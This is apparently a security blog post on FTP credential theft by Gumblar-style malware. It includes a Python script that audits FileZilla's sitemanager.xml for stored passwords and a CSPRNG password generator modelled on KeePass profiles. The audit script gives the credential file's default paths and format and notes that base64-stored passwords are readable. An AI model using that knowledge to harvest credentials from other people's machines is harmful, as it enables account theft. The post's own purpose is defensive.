Victims of Gumblar and similar drive-by-download exploits have had their FTP credentials stolen by harvesting them from data-stores used by applications like FileZilla and Dreamweaver.
FileZilla stores the information you enter into the Site Manager, and if you use the Normal logon type and enter a username and password, those are stored in an XML file in plain text. A safer practice with FileZilla is to choose Interactive for the logon type; that way you will be prompted for the password when you connect. Then use Edit | Clear private data... when you end your session to clear out the Quickconnect history and reconnect information.
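To see whether any of your own Site Manager entries still carry a stored password, the following audit script is an added example (not from the original post and not FileZilla's own code). It parses sitemanager.xml and reports, per entry, the logon type and whether a password is stored on disk, without ever printing the password itself. The numeric Logontype codes (1 = Normal, 3 = Interactive), the base64 `encoding` attribute that newer FileZilla 3 releases put on `<Pass>`, and the default file locations are taken from my reading of the FileZilla 3 format; check them against your version. The sample XML embedded in the script is constructed for the demonstration.

```python
import os
import sys
import xml.etree.ElementTree as ET

# Numeric Logontype codes used in FileZilla 3's sitemanager.xml (assumption,
# verify against your release): 1 = Normal stores the password on disk,
# 3 = Interactive prompts for it at connect time.
LOGONTYPES = {
    "0": "Anonymous",
    "1": "Normal",
    "2": "Ask for password",
    "3": "Interactive",
    "4": "Account",
}

# Constructed sample sitemanager.xml with three entries for the demonstration.
SAMPLE_SITEMANAGER = """<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>1</Logontype>
      <User>webmaster</User>
      <Pass>hunter2</Pass>
      <Name>Production site (Normal)</Name>
    </Server>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>3</Logontype>
      <User>webmaster</User>
      <Name>Production site (Interactive)</Name>
    </Server>
    <Server>
      <Host>sftp.partner.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Logontype>1</Logontype>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Name>Partner SFTP (Normal, base64)</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def audit_sitemanager(xml_text):
    """Return one finding per <Server> element; the password is never copied out."""
    root = ET.fromstring(xml_text)
    findings = []
    # iter() walks nested <Folder> elements too, so grouped sites are covered.
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        has_pass = pass_el is not None and (pass_el.text or "").strip() != ""
        logontype = (server.findtext("Logontype") or "").strip()
        findings.append({
            "name": server.findtext("Name") or "",
            "host": server.findtext("Host") or "",
            "user": server.findtext("User") or "",
            "logontype": LOGONTYPES.get(logontype, "unknown(%s)" % logontype),
            "stored_password": has_pass,
            # base64 is an encoding, not encryption: the secret is still readable
            # by anything that can read the file, so it counts as plain text here.
            "password_encoding": pass_el.get("encoding", "plain") if has_pass else None,
        })
    return findings


def risky_entries(findings):
    """Entries that should be switched to Interactive and have the password removed."""
    return [f for f in findings if f["stored_password"]]


def default_sitemanager_path():
    """Usual location of sitemanager.xml (assumption: FileZilla 3 defaults)."""
    if sys.platform.startswith("win"):
        return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "sitemanager.xml")
    return os.path.expanduser("~/.config/filezilla/sitemanager.xml")


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else default_sitemanager_path()
    if os.path.exists(path):
        with open(path, encoding="utf-8") as fh:
            xml_text = fh.read()
    else:
        print("No %s found; auditing the constructed sample instead." % path)
        xml_text = SAMPLE_SITEMANAGER
    for f in audit_sitemanager(xml_text):
        flag = ("STORED PASSWORD (%s)" % f["password_encoding"]) if f["stored_password"] else "ok"
        print("%-32s %-20s %-18s %s" % (f["name"], f["host"], f["logontype"], flag))
```

Run it with no arguments to audit your own profile, or pass a path to a copied sitemanager.xml. Any entry flagged as having a stored password is one to reopen in the Site Manager, switch to Interactive, and save, after which the `<Pass>` element disappears from the file.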
Don’t like having to remember logon credentials? Why not use a respectable, dedicated password manager? One popular free/open-source password manager is KeePass. Take advantage of its random password generator. This will generate some very ugly passwords you’ll never remember, but you can use its copy/paste or the auto-type feature to make entering your credentials easy. Use its Password Profiles to tailor the generated password to match the schemes used by the different websites you frequent. Save the profile and use it next time you change your password. Use the password expiration feature to remind you to change your password. If you try it and like it, you can make a donation to the project.
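The profile idea (one generator setting per site's password rules) is easy to get subtly wrong by using a non-cryptographic random source or by forgetting to guarantee every required character class. The script below is an added example, not KeePass code, showing how such profile-driven generation works: it draws from the operating system's CSPRNG via Python's `secrets` module, guarantees one character from each class the profile requires, shuffles with the same CSPRNG so class positions do not leak, and estimates the resulting entropy. The profile names, lengths and symbol set are constructed for the demonstration.

```python
import math
import secrets
import string

# Character classes a profile can require (the symbol set is a constructed choice;
# trim it to what a given site actually accepts).
CLASSES = {
    "upper": string.ascii_uppercase,
    "lower": string.ascii_lowercase,
    "digits": string.digits,
    "symbols": "!@#$%^&*()-_=+[]{};:,.?",
}

# Constructed profiles in the spirit of KeePass "Password Profiles": each names the
# classes a site accepts and the length it allows.
PROFILES = {
    "default":  {"length": 20, "classes": ["upper", "lower", "digits", "symbols"]},
    "alnum-16": {"length": 16, "classes": ["upper", "lower", "digits"]},
    "digits-8": {"length": 8,  "classes": ["digits"]},
}


def generate(profile_name, rng=secrets):
    """Generate a password for the named profile using a CSPRNG (secrets by default)."""
    profile = PROFILES[profile_name]
    classes = [CLASSES[c] for c in profile["classes"]]
    length = profile["length"]
    if length < len(classes):
        raise ValueError("profile length is too short to include every required class")
    # One guaranteed character from each required class ...
    chars = [rng.choice(cls) for cls in classes]
    # ... and the remainder from the union of all allowed characters.
    alphabet = "".join(classes)
    chars += [rng.choice(alphabet) for _ in range(length - len(chars))]
    # Fisher-Yates shuffle driven by the CSPRNG, so the guaranteed characters do not
    # always sit in the first positions.
    for i in range(len(chars) - 1, 0, -1):
        j = rng.randbelow(i + 1)
        chars[i], chars[j] = chars[j], chars[i]
    return "".join(chars)


def entropy_bits(profile_name):
    """Upper bound on entropy: length * log2(alphabet size). The per-class guarantee
    removes a small fraction of the space, so the true figure is slightly lower."""
    profile = PROFILES[profile_name]
    alphabet = "".join(CLASSES[c] for c in profile["classes"])
    return profile["length"] * math.log2(len(alphabet))


def matches_profile(password, profile_name):
    """Check a password against its profile: right length, only allowed characters,
    and at least one character from every required class."""
    profile = PROFILES[profile_name]
    classes = [CLASSES[c] for c in profile["classes"]]
    alphabet = "".join(classes)
    return (len(password) == profile["length"]
            and all(ch in alphabet for ch in password)
            and all(any(ch in cls for ch in password) for cls in classes))


if __name__ == "__main__":
    for name in PROFILES:
        pw = generate(name)
        print("%-10s %-22s ~%.1f bits  valid=%s" % (name, pw, entropy_bits(name), matches_profile(pw, name)))
```

Two things the numbers make visible: an 8-digit profile sits around 26 bits, which is why a site that forces such a scheme deserves every other protection you can give it, while the 20-character default profile is far beyond anything worth guessing online. Do not replace `secrets` with the `random` module; `random` is seeded from a predictable state and is not meant for secrets.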
You can carry your KeePass environment with you on a secure USB stick like IronKey or SafeStick so you’ll always have it with you.
Since we’re talking about password theft, here are some other things to keep in mind:
Don’t use your browser’s ability to “remember” logon credentials. Why would you rely on the browser’s password security mechanism when we know browsers are heavily targeted and continually found to have security holes?
Don’t sign into your sensitive accounts from untrusted computers like “convenient” kiosks. If you’re on travel and you MUST have access to your accounts, try a product like IronKey and look into their optional Secure Sessions Service.
Don’t access accounts you want to keep secure without using some type of encrypted channel such as SSL or TLS, not even from your own computer; this goes for FTP accounts as well.
Remember, security and convenient access are often competing goals; you have to weigh one against the other and decide which is more important to you.
QK